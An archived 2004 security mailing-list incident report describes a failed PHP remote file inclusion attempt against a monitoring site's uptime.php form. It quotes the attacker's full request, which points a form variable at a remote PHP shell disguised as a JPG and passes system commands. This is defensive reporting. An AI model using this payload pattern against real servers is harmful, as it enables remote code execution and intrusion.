Data Cha0s PHP script attempt

From: Kirby Angell (kangell_at_alertra.com)
Date: 10/02/04

  • Next message: Michel Arboi: "DllTrojan ?" 
    Date: Fri, 01 Oct 2004 22:51:51 -0500
To: Incidents List <incidents@securityfocus.com>

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Source IP: 200.203.109.237
    Attack: PHP form variable include

    Twice tonight our web server received URL requests like this:

    GET
    /uptime.php?pin=http://www.ka0ticl4b.hpgvip.ig.com.br/cse.jpg?&cmd=ls%20/;uname%20-a;w
    HTTP/1.0
    Host: uptime.alertra.com
    User-Agent: lwp-trivial/1.35

    The attack attempts to trick the uptime.php form into loading the given
    URL through one of the form variables. Our forms are highly paranoid,
    so that didn't work. Of interest though, if you haven't seen it (and I
    hadn't) is the script they tried to download:

    http://www.ka0ticl4b.hpgvip.ig.com.br/cse.jpg

    which isn't a JPG at all, but itself is a PHP page. I guess they
    thought that our "pin" variable was used in an "include" statement. The
    rogue PHP script does all sorts of interesting things such as, running
    commands (as in the attack above), gathering intelligence, attempting
    exploits, and setting up back doors.

    The script is apparently not too recent. It won't work on any default
    PHP install version 4.2 and above because it assumes the variables
    passed to it will be converted to global variables (see:
    http://www.php.net/manual/en/security.globals.php). Recent versions of
    PHP no longer do this.

    The attacking IP seems to be a radio station in Brazil. I have sent an
    e-mail to them informing them that they are probably compromised.

    I couldn't find much information about "lwp-trivial", but it seems to be
    not good for anything but badness. I guess I'll have to look into
    banning bots like this from our web server all together.

    - --
    Thank you,

    Kirby Angell
    Get notified anytime your website goes down!
    http://www.alertra.com
    key: 9004F4C0
    fingerprint: DD7E E88D 7F50 2A1E 229D 836A DB5B A751 9004 F4C0
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.2.4 (GNU/Linux)

    iD8DBQFBXiXX21unUZAE9MARAnW3AJ0fl6LqRCuHHvPa8cVg+2QKEPEAPACglchA
    LS8peUWtvAbSMlWVFW7jr7o=
    =vxrb
    -----END PGP SIGNATURE-----

  • Next message: Michel Arboi: "DllTrojan ?"

    Relevant Pages

    • Re: Data Cha0s PHP script attempt
      ... > banning bots like this from our web server all together. ... > The attack attempts to trick the uptime.php form into loading the given ... > URL through one of the form variables. ... > which isn't a JPG at all, but itself is a PHP page. ...
      (Incidents)
    • [Full-disclosure] PHP filesystem attack vectors
      ... Systems Affected PHP and PHP+Suhosin ... PHP filesystem functions path normalization attack ... PHP filesystem functions path normalization attack details ...
      (Full-Disclosure)
    • PHP filesystem attack vectors
      ... Systems Affected PHP and PHP+Suhosin ... PHP filesystem functions path normalization attack ... PHP filesystem functions path normalization attack details ...
      (Bugtraq)
    • [Full-disclosure] Advisory: Weak RNG in PHP session ID generation leads to session hijacking
      ... PHP session ID generation uses RNG with weak properties ... session hijacking ... PHP utilizes a cryptographically weak random number generator to ... A PHP site becomes vulnerable to the attack described below if it ...
      (Full-Disclosure)
    • Re: PHP and SCRIPT_NAME variable
      ... then be able to perform XSS attack with something equivalant to: ... influence over the following PHP variable: ... as far as I know the elements of the $_SERVER array are filled by the webserver and therefore a manipulation through a php trick might by difficult. ... But it would be also quite interesting if php uses the items of this array to do something or if its just an array with no effect for the php scripts. ...
      (Vuln-Dev)